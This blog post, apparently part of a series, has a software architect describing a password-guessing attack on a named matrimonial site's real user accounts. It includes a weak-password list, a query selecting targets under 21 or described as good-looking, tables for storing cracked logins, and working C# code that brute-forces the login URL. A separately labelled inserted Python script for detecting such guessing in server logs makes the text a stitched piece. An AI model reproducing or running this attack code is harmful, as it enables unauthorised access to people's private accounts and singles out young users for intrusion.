Search for life partner-A Software Architect experiences-Part-2

This is the second post on the subject "Search for life partner-A Software Architect experiences".
In the first part, Search for life partner-A Software Architect experiences-Part-1, we extracted profiles from http://www.shaadionline.tv by Geo and saved them in a local SQL Server database, so that we could search each and every field of a profile with all possible combinations.

So we solved the first problem. The second problem was that I wanted some userid/password to log in to their profile. So in order to solve this problem, I decided to try a dictionary attack on their web site with a hit-and-try strategy.
So the objective of this post is to extract the weak passwords from http://www.shaadionline.tv by Geo.
Follow the steps as:
1. So I identified possible passwords and declared them in an array of strings as:

string[] lstPossiblePasswords = { "1", "12", "123", "1234", "12345", "123456", "1234567", "12345678", "123456789", "1234567890", "21", "321", "4321", "54321", "654321", "7654321", "87654321", "987654321", "0987654321", "a", "ab", "abc", "abcd", "abcde", "abcdef","ba","cba","dcba" ,"edcba","fedcba","abc123","pass","password","pass1","pass12","pass123","pass21","pass321","shaadi","shaadioline"};

2. I decided to use the profiles extracted in part 1 as the starting point for the dictionary attack. So I decided the starting-point criteria as:

var q = from p in dbx.Profiles
        where p.EducationDetails.ToLower().Contains("psych")
           || p.EducationDetails.ToLower().Contains("bba")
           || p.EducationDetails.ToLower().Contains("bcs")
           || p.EducationDetails.ToLower().Contains("computer")
           || p.Looks.ToLower().Contains("stun")
           || p.Age < 21
        orderby p.GID descending
        select p;


3. For this activity I created 2 new tables: the Users table for saving verified/confirmed passwords.

CREATE TABLE [dbo].[Users](
	[Id] [int] IDENTITY(1,1) NOT NULL,
	[GID] [int] NULL,
	[ProfileId] [varchar](500) NULL,
	[Password] [varchar](500) NULL,
 CONSTRAINT [PK_Users] PRIMARY KEY CLUSTERED 
(
	[Id] ASC
)WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON) ON [PRIMARY]
) ON [PRIMARY]

GO

SET ANSI_PADDING OFF
GO

The PasswordSearch table for tracking the profile ids on which the dictionary attack has already been tried.

CREATE TABLE [dbo].[PasswordSearch](
	[Id] [int] IDENTITY(1,1) NOT NULL,
	[GID] [int] NULL,
 CONSTRAINT [PK_PasswordSearch] PRIMARY KEY CLUSTERED 
(
	[Id] ASC
)WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON) ON [PRIMARY]
) ON [PRIMARY]

GO

4. Add all 3 tables to the LINQ to SQL designer, build the solution once, and put the following code in the event handler of a button.

DataClassesShaadiOnlineDataContext dbx = new DataClassesShaadiOnlineDataContext();

var q = from p in dbx.Profiles
        where p.EducationDetails.ToLower().Contains("psych")
           || p.EducationDetails.ToLower().Contains("bba")
           || p.EducationDetails.ToLower().Contains("bcs")
           || p.EducationDetails.ToLower().Contains("computer")
           || p.Looks.ToLower().Contains("stun")
           || p.Age < 21
        orderby p.GID descending
        select p;

//q.OrderByDescending<Profile>("GID");
foreach (var item in q)
{
    foreach (var itemi in lstPossiblePasswords)
    {
        string URL = "http://www.shaadionline.tv/chklogin.asp?camefrom=acc" + "&loginid=" + item.ProfileID + "&pass1=" + itemi;
        string result = DownloadWebPage(URL);
        if (!result.Contains("Please enter correct UserID and Password"))
        {
            User user = new User();
            user.GID = item.GID;
            user.ProfileId = item.ProfileID;
            user.Password = itemi;
            dbx.Users.InsertOnSubmit(user);
            dbx.SubmitChanges();
        }
    }
    PasswordSearch ps = new PasswordSearch();
    ps.GID = item.GID;
    dbx.PasswordSearches.InsertOnSubmit(ps);
    dbx.SubmitChanges();
}


The above code loads the profiles extracted in part 1 by applying some criteria (those whose education mentions bba, bcs or psych*, or whose looks mention stun*, or whose age is less than 21 years). Then each profile is tried against the possible passwords by hitting the login URL, and if a userid/password combination is verified/confirmed as correct, it is saved in the Users table.
5. The following function is used for hitting the web site with a userid/password.

using System.IO;
using System.Net;

/// <summary>
/// Returns the content of a given web address as a string.
/// </summary>
/// <param name="Url">URL of the webpage</param>
/// <returns>Website content</returns>
public string DownloadWebPage(string Url)
{
    // Open a connection
    HttpWebRequest WebRequestObject = (HttpWebRequest)HttpWebRequest.Create(Url);

    // You can also specify additional header values like
    // the user agent or the referer:
    WebRequestObject.UserAgent = ".NET Framework/2.0";

    WebRequestObject.Referer = "http://www.example.com/";

    // Request response:
    WebResponse Response = WebRequestObject.GetResponse();

    // Open data stream:
    Stream WebStream = Response.GetResponseStream();

    // Create reader object:
    StreamReader Reader = new StreamReader(WebStream);

    // Read the entire stream content:
    string PageContent = Reader.ReadToEnd();

    // Cleanup
    Reader.Close();
    WebStream.Close();
    Response.Close();

    return PageContent;
}

So by this activity we can extract the profiles with weak passwords.
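The other side of the procedure above is what the site operator could have seen: because chklogin.asp takes loginid and pass1 in the query string, every guess lands in the web server's access log with the password in cleartext, and a loop like the one in step 4 shows up as many distinct pass1 values for one loginid from one client in a few seconds. The following detection script is an added example, not part of the original post; it assumes a simplified IIS W3C-style log with the fields date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query and sc-status, and the sample lines are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Constructed sample log: 203.0.113.5 cycles passwords against one loginid
# (the pattern of step 4), 198.51.100.9 logs in once and browses normally.
SAMPLE_LOG = """\
2006-03-01 10:00:01 203.0.113.5 GET /chklogin.asp camefrom=acc&loginid=P1001&pass1=1 200
2006-03-01 10:00:02 203.0.113.5 GET /chklogin.asp camefrom=acc&loginid=P1001&pass1=12 200
2006-03-01 10:00:02 203.0.113.5 GET /chklogin.asp camefrom=acc&loginid=P1001&pass1=123 200
2006-03-01 10:00:03 203.0.113.5 GET /chklogin.asp camefrom=acc&loginid=P1001&pass1=1234 200
2006-03-01 10:00:03 203.0.113.5 GET /chklogin.asp camefrom=acc&loginid=P1001&pass1=pass 200
2006-03-01 10:00:04 203.0.113.5 GET /chklogin.asp camefrom=acc&loginid=P1002&pass1=1 200
2006-03-01 10:05:00 198.51.100.9 GET /chklogin.asp camefrom=acc&loginid=P2000&pass1=s3cret 200
2006-03-01 10:06:00 198.51.100.9 GET /profile.asp id=P2000 200
"""


def parse_line(line):
    """Return (timestamp, ip, loginid, pass1) for a chklogin.asp hit, else None."""
    parts = line.split()
    if len(parts) != 7 or parts[4] != "/chklogin.asp":
        return None
    q = parse_qs(parts[5])  # the credentials sit in cs-uri-query, in cleartext
    ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
    return ts, parts[2], q.get("loginid", [""])[0], q.get("pass1", [""])[0]


def find_guessing(log_text, max_guesses=3, window=timedelta(minutes=5)):
    """Flag (ip, loginid) pairs that tried more than max_guesses distinct
    passwords inside one sliding window. Returns sorted (ip, loginid, count)."""
    attempts = defaultdict(list)  # (ip, loginid) -> [(timestamp, pass1), ...]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            ts, ip, uid, pw = rec
            attempts[(ip, uid)].append((ts, pw))
    flagged = []
    for (ip, uid), hits in attempts.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            # distinct passwords seen within `window` of this attempt
            distinct = {pw for t, pw in hits[i:] if t - t0 <= window}
            if len(distinct) > max_guesses:
                flagged.append((ip, uid, len(distinct)))
                break
    return sorted(flagged)
```

The same per-(ip, loginid) counter is the natural trigger for a lockout or a per-client rate limit on the login handler, and moving credentials out of the query string keeps them out of the access log in the first place.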

Best of luck in searching for a life partner as a software professional.

Note: It is not that I am exposing some secret. Any programmer can do that easily. I warned the Shaadionline and Geo team about the weak security in writing back in 2005-2006. But they have not taken any action about its security up till now. That is very disappointing to me.
